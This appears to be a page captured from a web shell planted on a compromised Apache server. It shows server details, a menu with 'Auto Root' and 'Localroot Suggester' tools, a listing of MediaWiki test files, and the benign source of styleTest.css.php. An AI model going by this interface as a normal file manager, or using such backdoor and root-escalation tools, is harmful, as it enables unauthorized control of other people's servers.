Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
wiki.bernardino.org /
tests /
qunit /
data /
Delete
Unzip
Name
Size
Permission
Date
Action
callMwLoaderTestCallback.js
33
B
-rw-r--r--
2016-11-28 20:20
defineCallMwLoaderTestCallback.js
29
B
-rw-r--r--
2016-11-28 20:20
defineTestCallback.js
129
B
-rw-r--r--
2011-07-10 21:10
generateJqueryMsgData.php
4.55
KB
-rw-r--r--
2016-11-28 20:20
load.mock.php
2.19
KB
-rw-r--r--
2016-11-28 20:20
mediawiki.jqueryMsg.data.js
16.37
KB
-rw-r--r--
2016-11-28 20:20
qunitOkCall.js
64
B
-rw-r--r--
2016-11-28 20:20
requireCallMwLoaderTestCallback.js
136
B
-rw-r--r--
2016-11-28 20:20
styleTest.css.php
1.77
KB
-rw-r--r--
2016-11-28 20:20
testrunner.js
16.68
KB
-rw-r--r--
2016-11-28 20:20
testwarm.inject.js
8.73
KB
-rw-r--r--
2011-07-10 21:10
Save
Rename
<?php /** * Dynamically create a simple stylesheet for unit tests in MediaWiki. * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License along * with this program; if not, write to the Free Software Foundation, Inc., * 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. * http://www.gnu.org/copyleft/gpl.html * * @file * @package MediaWiki * @author Timo Tijhof * @since 1.20 */ header( 'Content-Type: text/css; charset=utf-8' ); /** * Allows characters in ranges [a-z], [A-Z] and [0-9], * in addition to a dot ("."), dash ("-"), space (" ") and hash ("#"). * @since 1.20 * * @param string $val * @return string Value with any illegal characters removed. */ function cssfilter( $val ) { return preg_replace( '/[^A-Za-z0-9\.\- #]/', '', $val ); } // Do basic sanitization $params = array_map( 'cssfilter', $_GET ); // Defaults $selector = isset( $params['selector'] ) ? $params['selector'] : '.mw-test-example'; $property = isset( $params['prop'] ) ? $params['prop'] : 'float'; $value = isset( $params['val'] ) ? $params['val'] : 'right'; $wait = isset( $params['wait'] ) ? (int)$params['wait'] : 0; // seconds sleep( $wait ); $css = " /** * Generated " . gmdate( 'r' ) . ". * Waited {$wait}s. */ $selector { $property: $value; } "; echo trim( $css ) . "\n";